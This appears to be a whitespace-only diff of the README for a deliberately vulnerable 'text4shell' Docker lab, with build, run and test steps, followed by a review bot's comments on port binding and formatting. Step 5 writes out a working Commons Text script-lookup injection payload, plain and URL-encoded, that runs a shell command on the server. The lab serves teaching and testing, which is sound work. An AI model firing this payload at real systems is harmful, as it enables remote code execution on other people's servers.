| skipped 4 lines |
5 | 5 | | 1. Maven install to create the fat jar |
6 | 6 | | |
7 | 7 | | ``` |
8 | | - | mvn clean install |
| 8 | + | mvn clean install |
9 | 9 | | ``` |
10 | 10 | | |
11 | 11 | | 2. Docker build |
12 | 12 | | |
13 | 13 | | ``` |
14 | | - | docker build --tag=text4shell . |
| 14 | + | docker build --tag=text4shell . |
15 | 15 | | ``` |
16 | 16 | | |
17 | 17 | | 3. Docker run |
18 | 18 | | |
19 | 19 | | ``` |
20 | | - | docker run -p 80:8080 text4shell |
| 20 | + | docker run -p 80:8080 text4shell |
21 | 21 | | ``` |
22 | 22 | | |
23 | 23 | | 4. Test the app |
24 | 24 | | |
25 | 25 | | ``` |
26 | | - | http://localhost/text4shell/attack?search=<anything> |
| 26 | + | http://localhost/text4shell/attack?search=<anything> |
27 | 27 | | ``` |
28 | 28 | | |
29 | 29 | | 5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: |
30 | 30 | | |
31 | 31 | | ``` |
32 | | - | ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} |
| 32 | + | ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} |
33 | 33 | | ``` |
34 | 34 | | |
35 | | - | http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D |
| 35 | + | http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D |
36 | 36 | | |
37 | 37 | | 6. You can also try using `dns` or `url` prefixes. |
38 | 38 | | |
39 | 39 | | 7. Get the container id |
40 | 40 | | |
41 | 41 | | ``` |
42 | | - | docker container ls |
| 42 | + | docker container ls |
43 | 43 | | ``` |
44 | 44 | | |
45 | 45 | | 8. Get into the app |
46 | 46 | | |
47 | 47 | | ``` |
48 | | - | docker exec -it <container_id> bash |
| 48 | + | docker exec -it <container_id> bash |
49 | 49 | | ``` |
50 | 50 | | |
51 | 51 | | 9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): |
52 | 52 | | |
53 | 53 | | ``` |
54 | | - | ls /tmp/ |
| 54 | + | ls /tmp/ |
55 | 55 | | ``` |
56 | 56 | | |
57 | 57 | | 10. To stop the container |
58 | 58 | | |
59 | 59 | | ``` |
60 | | - | docker container stop <container_id> |
| 60 | + | docker container stop <container_id> |
61 | 61 | | ``` |
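Review bot: step 3's `docker run -p 80:8080 text4shell` publishes the deliberately vulnerable app on port 80 of every host interface, so anyone on the same network can reach the `attack` endpoint shown in steps 4 and 5; bind it to loopback instead (`docker run -p 127.0.0.1:80:8080 text4shell`) and say in step 4 that the URL is only reachable from the host. Separately, every `-`/`+` pair in this hunk is byte-identical as rendered (`mvn clean install`, `docker build --tag=text4shell .`, and so on), which means the change is whitespace or line-ending only; the commit should say so, and a `.gitattributes` line such as `* text=auto` would prevent the README from being re-diffed for the same reason later. Minor: the fences carry no language tag, so tagging the shell snippets with `bash` would render them properly, and step 5's "the aforementioned lookup" refers to text outside this hunk, so naming the `script` lookup there would let the step stand on its own.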